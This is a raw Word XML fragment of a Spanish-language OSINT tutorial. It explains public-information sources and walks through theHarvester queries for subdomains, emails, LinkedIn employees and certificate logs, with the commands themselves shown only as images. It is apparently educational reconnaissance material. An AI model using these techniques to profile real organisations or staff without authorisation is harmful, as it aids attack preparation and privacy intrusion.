                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>🔍</w:t>
            </w:r>
            <w:r w:rsidRPr="000C4AB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Ejemplos de fuentes OSINT:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6324E3DD" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0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0C4AB0">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Redes sociales (Twitter, Facebook, LinkedIn, etc.)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19468AA0" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="000C4AB0">
              <w:t>Sitios web y blogs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4240E0D6" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="000C4AB0">
              <w:t>Foros, bases de datos públicas, registros de dominio (WHOIS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DFE3ADF" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="000C4AB0">
              <w:t>Imágenes, videos, metadatos, noticias</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D2561A4" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRDefault="000C4AB0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="000C4AB0">
              <w:t>Shodan, Google Dorks, etc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3274DED1" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRDefault="000C4AB0" w:rsidP="000C4AB0"/>
          <w:p w14:paraId="1310F317" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0" w:rsidP="000C4AB0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C4AB0">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>💡</w:t>
            </w:r>
            <w:r w:rsidRPr="000C4AB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Usos comunes:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C4A833D" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="000C4AB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ciberseguridad:</w:t>
            </w:r>
            <w:r w:rsidRPr="000C4AB0">
              <w:t xml:space="preserve"> descubrir vulnerabilidades o información expuesta.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21997262" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="000C4AB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Investigaciones policiales o periodísticas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C5EE6C" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="000C4AB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Análisis de amenazas y fraudes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42587063" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="000C4AB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reconocimiento previo a un pentesting.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55DC66EC" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0" w:rsidP="000C4AB0">
            <w:r w:rsidRPr="000C4AB0">
              <w:t xml:space="preserve">En resumen: </w:t>
            </w:r>
            <w:r w:rsidRPr="000C4AB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>OSINT = investigar usando información pública y legalmente accesible.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C82E8F2" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRPr="000C4AB0" w:rsidRDefault="000C4AB0" w:rsidP="000C4AB0"/>
          <w:p w14:paraId="37E982F2" w14:textId="77777777" w:rsidR="000C4AB0" w:rsidRDefault="000C4AB0" w:rsidP="002E6DB1"/>
          <w:p w14:paraId="73652B60" w14:textId="6CA7B7E4" w:rsidR="00A82D0B" w:rsidRPr="00A82D0B" w:rsidRDefault="00A82D0B" w:rsidP="002E6DB1"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AFF7AAC" w14:textId="77777777" w:rsidR="002E6DB1" w:rsidRPr="002E6DB1" w:rsidRDefault="002E6DB1" w:rsidP="002E6DB1"/>
    <w:p w14:paraId="0552681D" w14:textId="42E88579" w:rsidR="0094014B" w:rsidRDefault="0094014B" w:rsidP="0094014B">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094014B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.9.2 HERRAMIENTAS RELACIONADAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4ACCF8" w14:textId="1CD8EBE7" w:rsidR="0094014B" w:rsidRPr="0094014B" w:rsidRDefault="005357EE" w:rsidP="0094014B">
      <w:r w:rsidRPr="005357EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48DEC659" wp14:editId="2F8A21A6">
            <wp:extent cx="5480050" cy="1135081"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
            <wp:docPr id="5059923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923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367" cy="11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B10B" w14:textId="001FE62C" w:rsidR="002E6DB1" w:rsidRDefault="005357EE" w:rsidP="003860AC">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">En resumen: </w:t>
      </w:r>
      <w:r w:rsidRPr="005357EE">
        <w:t>theHarvester</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“aspiradora de información publica” </w:t>
      </w:r>
      <w:r>
        <w:t>que automatiza la recopilación de datos sobre un objetivo desde decenas de fuentes, usado en la gase inicial de reconocimiento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1F8C6F" w14:textId="423A286B" w:rsidR="005357EE" w:rsidRDefault="005357EE" w:rsidP="003860AC"/>
    <w:p w14:paraId="0518DD28" w14:textId="77777777" w:rsidR="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003860AC"/>
    <w:p w14:paraId="74B05BE1" w14:textId="77777777" w:rsidR="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003860AC"/>
    <w:p w14:paraId="21169C02" w14:textId="77777777" w:rsidR="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003860AC"/>
    <w:p w14:paraId="6D46F239" w14:textId="77777777" w:rsidR="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003860AC"/>
    <w:p w14:paraId="5E4A727F" w14:textId="77777777" w:rsidR="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003860AC"/>
    <w:p w14:paraId="3EFE19A8" w14:textId="77777777" w:rsidR="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003860AC"/>
    <w:p w14:paraId="4EF08D2E" w14:textId="77777777" w:rsidR="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003860AC"/>
    <w:p w14:paraId="2462DA71" w14:textId="77777777" w:rsidR="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003860AC"/>
    <w:p w14:paraId="0EFDEE23" w14:textId="77777777" w:rsidR="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003860AC"/>
    <w:p w14:paraId="08362C67" w14:textId="176579E4" w:rsidR="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003A1AD0">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consultas fundamentales, comunes y avanzadas – TheHarvester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7442423C" w14:textId="22A3B66E" w:rsidR="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003A1AD0">
      <w:pPr>
        <w:pStyle w:val="Ttulo5"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.9.3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>🟢</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIVEL 1: CONSULTAS BÁSICAS (Principiantes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A38C22" w14:textId="77777777" w:rsidR="00F40B90" w:rsidRPr="00F40B90" w:rsidRDefault="00F40B90" w:rsidP="00F40B90"/>
    <w:p w14:paraId="38C74CAA" w14:textId="77777777" w:rsidR="003A1AD0" w:rsidRPr="003A1AD0" w:rsidRDefault="003A1AD0" w:rsidP="003A1AD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1. Búsqueda Simple de Subdominios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA085B4" w14:textId="38E20492" w:rsidR="003A1AD0" w:rsidRDefault="00F40B90" w:rsidP="003860AC">
      <w:r w:rsidRPr="00F40B90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51D61A0C" wp14:editId="2E30C148">
            <wp:extent cx="6858000" cy="1088390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6648366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66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CF6" w14:textId="77777777" w:rsidR="00F40B90" w:rsidRPr="00F40B90" w:rsidRDefault="00F40B90" w:rsidP="00F40B90">
      <w:r w:rsidRPr="00F40B90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40B90">
        <w:t xml:space="preserve"> Encuentra subdominios de ejemplo.com usando solo Bing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFA1DE7" w14:textId="77777777" w:rsidR="00F40B90" w:rsidRPr="00F40B90" w:rsidRDefault="00F40B90" w:rsidP="00F40B90">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40B90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2. Búsqueda de Emails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D1706A" w14:textId="0E5F1145" w:rsidR="00F40B90" w:rsidRDefault="00F40B90" w:rsidP="003860AC">
      <w:r w:rsidRPr="00F40B90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70264DDE" wp14:editId="1C569FAE">
            <wp:extent cx="6858000" cy="1040765"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="12137669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669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E938" w14:textId="421EC6A3" w:rsidR="00F40B90" w:rsidRDefault="0080367D" w:rsidP="003860AC">
      <w:r w:rsidRPr="0080367D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="0080367D">
        <w:t xml:space="preserve"> Encuentra emails corporativos (requiere API key para Hunter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73773D69" w14:textId="77777777" w:rsidR="0080367D" w:rsidRPr="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080367D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3. Guardar Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795DDB13" w14:textId="2F3F546A" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="003860AC">
      <w:r w:rsidRPr="0080367D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B963662" wp14:editId="3271081C">
            <wp:extent cx="6858000" cy="1002030"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="92356235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62357" name="Imagen 1" descr="Gráfico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9CA9" w14:textId="77777777" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080367D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="0080367D">
        <w:t xml:space="preserve"> Guarda todo en </w:t>
      </w:r>
      <w:r w:rsidRPr="0080367D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>resultados.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="0080367D">
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidRPr="0080367D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>resultados.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD70AE8" w14:textId="77777777" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAA2BE7" w14:textId="77777777" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EBDEFC" w14:textId="77777777" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E506052" w14:textId="77777777" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25230A41" w14:textId="77777777" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D0B8B4B" w14:textId="77777777" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B3D614" w14:textId="77777777" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D853E5" w14:textId="77777777" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C13DC37" w14:textId="77777777" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD8AEBB" w14:textId="77777777" w:rsidR="0080367D" w:rsidRPr="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D"/>
    <w:p w14:paraId="44D503D1" w14:textId="1D20903B" w:rsidR="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:pStyle w:val="Ttulo5"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.9.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>🟢</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIVEL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: CONSULTAS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>COMUNES</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Intermedias</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DA68FD" w14:textId="77777777" w:rsidR="0080367D" w:rsidRPr="0080367D" w:rsidRDefault="0080367D" w:rsidP="0080367D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080367D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4. Búsqueda en Múltiples Fuentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C595C4" w14:textId="2811271E" w:rsidR="0080367D" w:rsidRDefault="00A20616" w:rsidP="003860AC">
      <w:r w:rsidRPr="00A20616">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35166086" wp14:editId="5CE13157">
            <wp:extent cx="6858000" cy="1122680"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="5701816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816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38B" w14:textId="77777777" w:rsidR="00A20616" w:rsidRPr="00A20616" w:rsidRDefault="00A20616" w:rsidP="00A20616">
      <w:r w:rsidRPr="00A20616">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A20616">
        <w:t xml:space="preserve"> Combina resultados de 4 motores diferentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636AF42D" w14:textId="77777777" w:rsidR="00A20616" w:rsidRPr="00A20616" w:rsidRDefault="00A20616" w:rsidP="00A20616">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A20616">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5. Búsqueda Exhaustiva (ALL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A6D1EB" w14:textId="068B6FFB" w:rsidR="00A20616" w:rsidRDefault="004508DC" w:rsidP="003860AC">
      <w:r w:rsidRPr="004508DC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E53B5B8" wp14:editId="2AA85708">
            <wp:extent cx="6858000" cy="1013460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91924814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48145" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto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EE6D" w14:textId="7BE88B9D" w:rsidR="004508DC" w:rsidRDefault="004508DC" w:rsidP="003860AC">
      <w:r w:rsidRPr="004508DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="004508DC">
        <w:t xml:space="preserve"> Busca usando todos los motores disponibles</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0DB30A" w14:textId="77777777" w:rsidR="004508DC" w:rsidRDefault="004508DC" w:rsidP="003860AC"/>
    <w:p w14:paraId="4E5FE428" w14:textId="77777777" w:rsidR="004508DC" w:rsidRPr="004508DC" w:rsidRDefault="004508DC" w:rsidP="004508DC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004508DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>6. Buscar en LinkedIn (Empleados)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298CCE4" w14:textId="494DF2A6" w:rsidR="004508DC" w:rsidRDefault="004508DC" w:rsidP="003860AC">
      <w:r w:rsidRPr="004508DC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E62B1EE" wp14:editId="3AC7B625">
            <wp:extent cx="6858000" cy="1082675"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="9808095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09511" name="Imagen 1" descr="Interfaz de usuario gráfica, Aplicación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0486" w14:textId="72A15B04" w:rsidR="00AE4B3B" w:rsidRDefault="00AE4B3B" w:rsidP="003860AC">
      <w:r w:rsidRPr="00AE4B3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4B3B">
        <w:t xml:space="preserve"> Identifica empleados que trabajan actualmente o trabajaron previamente en la empresa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21496D84" w14:textId="3B2C40C7" w:rsidR="00392FEE" w:rsidRPr="00392FEE" w:rsidRDefault="00392FEE" w:rsidP="00392FEE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00392FEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Buscar Certificados SSL (Subdominios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187684FB" w14:textId="475FB33E" w:rsidR="00392FEE" w:rsidRDefault="00392FEE" w:rsidP="00392FEE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00392FEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6C3D32" wp14:editId="2286C94B">
            <wp:extent cx="6858000" cy="1101725"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="12265178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78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68B4" w14:textId="3D27E516" w:rsidR="00392FEE" w:rsidRDefault="00392FEE" w:rsidP="00392FEE">
      <w:r w:rsidRPr="00392FEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Qué hace: </w:t>
      </w:r>
      <w:r w:rsidRPr="00392FEE">
        <w:t>Usa logs de transparencia de certificados para descubrir dominios y subdominios activos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40097067" w14:textId="77777777" w:rsidR="00392FEE" w:rsidRDefault="00392FEE" w:rsidP="00392FEE"/>
